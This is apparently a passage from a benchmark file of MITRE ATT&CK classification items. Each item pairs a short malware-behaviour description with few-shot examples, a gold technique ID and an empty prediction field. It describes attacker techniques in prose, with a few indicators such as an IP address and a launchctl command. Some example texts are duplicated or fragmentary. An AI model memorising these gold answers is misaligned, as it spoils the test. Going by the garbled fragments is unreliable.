globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ixeshe has a command to delete a file from the machine.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Xbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find NO functionality within Xbash that would enable restoration after the ransom is paid\n\t - T1485: Data Destruction\n- Text: It\u2019s located on the hard drive and contains code that can display current volume shadow copy backups and all installed shadow copy writers and providers. Responsible for wiping deleted data from all drives using cipher.exe (cipher.exe is a built-in command-line tool in the Windows operating system that can be used to display or alter the encryption of directories and files on NTFS volumes. It\u2019s located on the hard drive and contains code that can display current volume shadow copy backups and all installed shadow copy writers and providers. 9) Responsible for wiping deleted data from all drives using cipher.exe (cipher.exe is a built-in command-line tool in the Windows operating system that can be used to display or alter the encryption of directories and files on NTFS volumes\n\t - T1490: Inhibit System Recovery\n", + "input": "Proxysvc can delete files indicated by the attacker and remove itself from disk using a batch file.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TSCookie has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.\n\t - T1204.001: User Execution - Malicious Link\n- Text: All observed attacks start with an email message, containing either a malicious attachment or a URL which leads to the first stage of the attack. The text of the emails is likely taken from legitimate email, such as mailing lists that targeted organisations may be subscribed to. Below are three examples, with the first one purporting to be sent by the European Banking Federation and is using a newly registered domain for the spoofed sender email address. The attachment is a malicious PDF file that entices the user to click on a URL to download and open a weaponized RTF file containing exploits for CVE-2017-11882, CVE-2017-8570 and CVE-2018-8174. This campaign contains a URL, which points to a malicious Word document where the infection chain is triggered by the user allowing the VBA macro code to run. Observed email campaign 2 The third campaign, sent on July 10, is a more personal campaign that targets a variety of businesses. The subject indicates that this is a complaint about problems with services provided by the target company, allegedly listed in an attached document. The attachment is an RTF document containing exploits that start the chain of several infection stages until the final executable payload is downloaded and loaded in the memory of the infected system. All emails lead to stage 1 of the attack chain. Observed email campaign 3\n\t - T1204.002: User Execution - Malicious File\n- Text: A threat actor known as Silent Librarian/TA407/COBALT DICKENS has been actively targeting universities via spear phishing campaigns since schools and universities went back\n\t - T1608.005: Stage Capabilities - Link Target\n", + "input": "Sidewinder has lured targets to click on malicious files to gain execution in the target environment.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RDAT can issue SOAP requests to delete already processed C2 emails. RDAT can also delete itself from the infected system.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: To ensure that the compromised system is unable to restore from backup, REvil deletes shadow copies and disables recovery mode by executing the following command via ShellExecute\n\t - T1490: Inhibit System Recovery\n- Text: APT29 temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.\n\t - T1070: Indicator Removal\n", + "input": "Cryptoistic has the ability delete files from a compromised host.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used application shim databases for persistence.\n\t - T1546.011: Event Triggered Execution - Application Shimming\n- Text: TEMP.Veles has modified and added entries within \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\" to maintain persistence.\n\t - T1546.012: Event Triggered Execution - Image File Execution Options Injection\n- Text: can bypass Windows UAC through either DLL hijacking, eventvwr, or appPaths.\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n", + "input": "SDBbot has the ability to use application shimming for persistence if it detects it is running as admin on Windows XP or 7, by creating a shim database to patch services.exe.", + "gold": "- T1546.011: Event Triggered Execution - Application Shimming", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: gh0st RAT has checked for the existence of a Service key to determine if it has already been installed on the system.\n\t - T1012: Query Registry\n- Text: Empire contains modules that can discover and exploit unquoted path vulnerabilities.\n\t - T1574.009: Hijack Execution Flow - Path Interception by Unquoted Path\n- Text: To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable\n\t - T1574.007: Hijack Execution Flow - Path Interception by PATH Environment Variable\n", + "input": "PowerSploit contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Blue Mockingbird has used Windows Explorer to manually copy malicious files to remote hosts over SMB.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: has used a tool known as RemoteExec (similar to ) to remotely execute batch scripts and binaries.\n\t - T1569.002: System Services - Service Execution\n- Text: collects a list of network shares with the command net share.\n\t - T1135: Network Share Discovery\n", + "input": "NotPetya can use PsExec, which interacts with the \"ADMIN$\" network share to execute commands on remote systems.", + "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN7 sent spearphishing emails with either malicious Microsoft Documents or RTF files attached.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: On November 9, 2018, we observed a relatively small email campaign (thousands of messages) delivering a new malware family that we call \u201cServHelper\u201d based on file names associated with infection. The campaign primarily targeted financial institutions and was attributed to the threat actor TA505. The messages (Figure 1) contained Microsoft Word or Publisher attachments with macros that, when enabled, downloaded and executed the malware. This campaign used the \u201ctunnel\u201d variant of ServHelper, described in the \u201cMalware Analysis\u201d section\n\t - T1204.001: User Execution - Malicious Link\n\t - T1204.002: User Execution - Malicious File\n- Text: The campaign commences via a SPAM email containing a malicious new URL being sent to potential victims. The URL landing page presents the recipient with a password for a ZIP file.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "JSS Loader has been executed through malicious attachments contained in spearphishing emails.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has the capability to access the webcam on the victim\u2019s machine.\n\t - T1125: Video Capture\n- Text: has a tool called CANDYKING to capture a screenshot of user's desktop.\n\t - T1113: Screen Capture\n- Text: has used an audio capturing utility known as SOUNDWAVE that captures microphone input.\n\t - T1123: Audio Capture\n", + "input": "Cobian RAT has a feature to perform screen capture.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BISCUIT can capture keystrokes.\n\t - T1056.001: Input Capture - Keylogging\n- Text: Gold Dragon stores information gathered from the endpoint in a file named 1.hwp.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: Dtrack can retrieve browser history.\n\t - T1217: Browser Information Discovery\n", + "input": "PowerLess can use a module to log keystrokes.", + "gold": "- T1056.001: Input Capture - Keylogging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bandook has decoded its PowerShell script.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: The cab file was encrypted and decrypted using a simple xor cipher with a rotating 16 byte key: \\x36\\x11\\xdd\\x08\\xac\\x4b\\x72\\xf8\\x51\\x04\\x68\\x2e\\x3e\\x38\\x64\\x32\n\t - T1027: Obfuscated Files or Information\n- Text: The export called \u201cSendDataToServer_2\u201d does exactly what the name means: it encrypts all collected data, encodes it using Base64 encoding and calls its additional library to send the data to the C2 server. The names of the C2 servers are hardcoded\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "Gorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects a unique identifier (UID) from a compromised host.\n\t - T1082: System Information Discovery\n- Text: GrimAgent has used \"Accept-Language\" to identify hosts in the United Kingdom, United States, France, and Spain.\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: STARWHALE can gather the username from an infected host.\n\t - T1033: System Owner/User Discovery\n", + "input": "Lucifer can collect the computer name, system architecture, default language, and processor frequency of a compromised host.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Tropic Trooper has injected a DLL backdoor into dllhost.exe and svchost.exe.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: This function aims to download the powershell code from the command and control server and execute it\n\t - T1105: Ingress Tool Transfer\n- Text: Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, this will load and execute the DLL/EXE in to memory without writing any files to disk.\n\t - T1620: Reflective Code Loading\n", + "input": "RARSTONE downloads its backdoor component from a C2 server and loads it directly into memory.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Filename: impku.dat:schemas File size: 608854 bytes MD5 hash: b774f39d31c32da0f6a5fb5d0e6d2892 SHA1 hash: ae3ff39c2a7266132e0af016a48b97d565463d90 Notes: Alternate data stream (ADS) PNG file with the PowerDuke backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA\n\t - T1564.004: Hide Artifacts - NTFS File Attributes\n- Text: Interestingly, the delivery document borrowed a technique which was publicized in late 2017 as being used by the Sofacy threat actors, embedding the main malicious code in a EXIF metadata property of the document\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Attor has staged collected data in a central upload directory prior to exfiltration.\n\t - T1074.001: Data Staged - Local Data Staging\n", + "input": "If the victim is using PowerShell 3.0 or later, POWERSOURCE writes its decoded payload to an alternate data stream (ADS) named kernel32.dll that is saved in \"%PROGRAMDATA%\\Windows\\\".", + "gold": "- T1564.004: Hide Artifacts - NTFS File Attributes", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The loaded module is a simple dropper. Upon loading the module, the AutoOpen method will be invoked. The malicious code in this method drops the final payload executable into %AppData%\\service.exe and executes it (see Figure 6)\n\t - T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness\n\t - T1574: Hijack Execution Flow\n\t - T1569.002: System Services - Service Execution\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: The malware platform can use Windows admin shares to move laterally.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: Lateral Movement APT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP)\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n", + "input": "Net Crawler uses PsExec to perform remote service manipulation to execute a copy of itself as part of lateral movement.", + "gold": "- T1569.002: System Services - Service Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Komplex trojan creates a persistent launch agent called with \"$HOME/Library/LaunchAgents/com.apple.updates.plist\" with \"launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist\".\n\t - T1543.001: Create or Modify System Process - Launch Agent\n- Text: If running with \"root\" permissions, OSX_OCEANLOTUS.D can create a persistence file in the folder \"/Library/LaunchDaemons\".\n\t - T1543.004: Create or Modify System Process - Launch Daemon\n- Text: No matching sample found for T1037.002\n", + "input": "Green Lambert can create a Launch Agent with the `RunAtLoad` key-value pair set to \"true\", ensuring the `com.apple.GrowlHelper.plist` file runs every time a user logs in.", + "gold": "- T1543.001: Create or Modify System Process - Launch Agent", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gelsemium has used dynamic DNS in its C2 infrastructure.\n\t - T1568: Dynamic Resolution\n- Text: We have identified 127 different domains used to host Silent Librarian phishing sites since 2013. Like a growing number of phishing sites, domains registered by Silent Librarian generally use Freenom top-level domains (TLDs) (.TK, . CF, .GA, .GQ, .ML) because they are available at no cost. The group has used domains on other TLDs, though rather sparingly. Some of the other recent TLDs associated with Silent Librarian domains include .IN, .IR, .INFO, .LINK, and .TOP\n\t - T1583.001: Acquire Infrastructure - Domains\n- Text: gh0st RAT operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.\n\t - T1568.001: Dynamic Resolution - Fast Flux DNS\n", + "input": "LazyScripter has used dynamic DNS providers to create legitimate-looking subdomains for C2.", + "gold": "- T1583.001: Acquire Infrastructure - Domains", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Unlike previous RDAT samples, this particular sample only uses DNS tunneling for its C2 communications with no HTTP fallback channel. This RDAT sample can only use TXT queries in its DNS tunnel and will issue queries structured like the following\n\t - T1071.004: Application Layer Protocol - DNS\n\t - T1008: Fallback Channels\n- Text: Magic Hound has acquired Amazon S3 buckets to use in C2.\n\t - T1583.006: Acquire Infrastructure - Web Services\n- Text: CosmicDuke exfiltrates collected files automatically over FTP to remote servers.\n\t - T1020: Automated Exfiltration\n", + "input": "RegDuke can use Dropbox as its C2 server.", + "gold": "- T1102.002: Web Service - Bidirectional Communication", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stop the running xmlprov service - Copy dropped xmlprov.dll and xmlrov.ini into the system32 directory and delete them from the current directory - Check if xmlProv service is installed or not and if it is not installed create the service through svchost.exe - Modify the xmlProv service values including type and binpath - Add xmlProv to the list of the services to be loaded by svchost - add xmlProv to the xmlProv registry key - Start the xmlProv service\n\t - T1112: Modify Registry\n- Text: EVILNUM has a function called \"DeleteLeftovers\" to remove certain artifacts of the attack.\n\t - T1070: Indicator Removal\n- Text: MCMD has the ability to remove set Registry Keys, including those used for persistence.\n\t - T1070.009: Indicator Removal - Clear Persistence\n", + "input": "Mori can write data to `HKLM\\Software\\NFC\\IPA` and `HKLM\\Software\\NFC\\` and delete Registry values.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HEXANE has used a PowerShell-based keylogger named `kl.ps1`.\n\t - T1056.001: Input Capture - Keylogging\n- Text: EvilGrab has the capability to capture audio from a victim machine.\n\t - T1123: Audio Capture\n- Text: No matching sample found for T1562.003\n", + "input": "DOGCALL is capable of logging keystrokes.", + "gold": "- T1056.001: Input Capture - Keylogging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BoomBox has the ability to mask malicious data strings as PDF files.\n\t - T1036: Masquerading\n- Text: During Operation CuckooBees, the threat actors renamed a malicious executable to `rundll32.exe` to allow it to blend in with other Windows system files.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Flame appears to have two modules designed for infecting USB sticks, called \u201cAutorun Infector\u201d and \u201cEuphoria\u201d. We haven\u2019t seen them in action yet, maybe due to the fact that Flame appears to be disabled in the configuration data. Nevertheless, the ability to infect USB sticks exists in the code, and it\u2019s using two methods\n\t - T1091: Replication Through Removable Media\n", + "input": "Aoqin Dragon has used fake icons including antivirus and external drives to disguise malicious payloads.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Once a removable media device is inserted back into the first victim, collects data from it that was exfiltrated from a second victim.\n\t - T1025: Data from Removable Media\n- Text: can obtain a list of smart card readers attached to the victim.\n\t - T1120: Peripheral Device Discovery\n- Text: StrongPity can automatically exfiltrate collected documents to the C2 server.\n\t - T1020: Automated Exfiltration\n", + "input": "Rover searches for files on attached removable drives based on a predefined list of file extensions every five seconds.", + "gold": "- T1025: Data from Removable Media", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LaZagne can obtain credentials from chats, databases, mail, and WiFi.\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n- Text: Matryoshka is capable of stealing Outlook passwords.\n\t - T1555: Credentials from Password Stores\n- Text: APT37 has used a credential stealer known as ZUMKONG that can harvest usernames and passwords stored in browsers.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", + "input": "Kimsuky has used tools that are capable of obtaining credentials from saved mail.", + "gold": "- T1552.001: Unsecured Credentials - Credentials In Files", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Group has sent malicious Word OLE compound documents to victims.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: One of the access vectors most used by ACTINIUM is spear-phishing emails with malicious macro attachments that employ remote templates. Remote template injection refers to the method of causing a document to load a remote document template that contains the malicious code, in this case, macros\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1027: Obfuscated Files or Information\n\t - T1204.002: User Execution - Malicious File\n\t - T1221: Template Injection\n- Text: EnvyScout contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.\n\t - T1027.006: Obfuscated Files or Information - HTML Smuggling\n", + "input": "Leviathan has utilized OLE as a method to insert malicious content inside various phishing documents.", + "gold": "- T1559.002: Inter-Process Communication - Dynamic Data Exchange", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.\n\t - T1014: Rootkit\n\t - T1574.006: Hijack Execution Flow - Dynamic Linker Hijacking\n- Text: No matching sample found for T1055.014\n- Text: Bazar can hash then resolve API calls at runtime.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n", + "input": "Hildegard has modified /etc/ld.so.preload to intercept shared library import functions.", + "gold": "- T1574.006: Hijack Execution Flow - Dynamic Linker Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. e@T#L$PH%\" as it is being passed along with the encrypted data. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Sliver can exfiltrate files from the victim using the \"download\" command.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: BBK can extract a malicious Portable Executable (PE) from a photo.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n", + "input": "UPPERCUT can capture desktop screenshots in the PNG format and send them to the C2 server.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This document was also the first of the mid-November cluster which used the user/USER author name instead of Joohn, further supporting the scenario of the document being copied between systems\n\t - T1033: System Owner/User Discovery\n- Text: Malicious use of Responder was first publicly documented on August 11, 2017 as being used by APT28, also known as Fancy Bear. The tool was used against hotel visitors to spoof NetBios resources. Victims were coerced into connecting to UDP port 137 and disclosing credentials over SMB to APT28, which the threat actor then used to gain elevated access to the network.\n\t - T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay\n\t - T1043: Commonly Used Port\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: Smoke Loader searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).\n\t - T1114.001: Email Collection - Local Email Collection\n", + "input": "APT37 identifies the victim username.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. 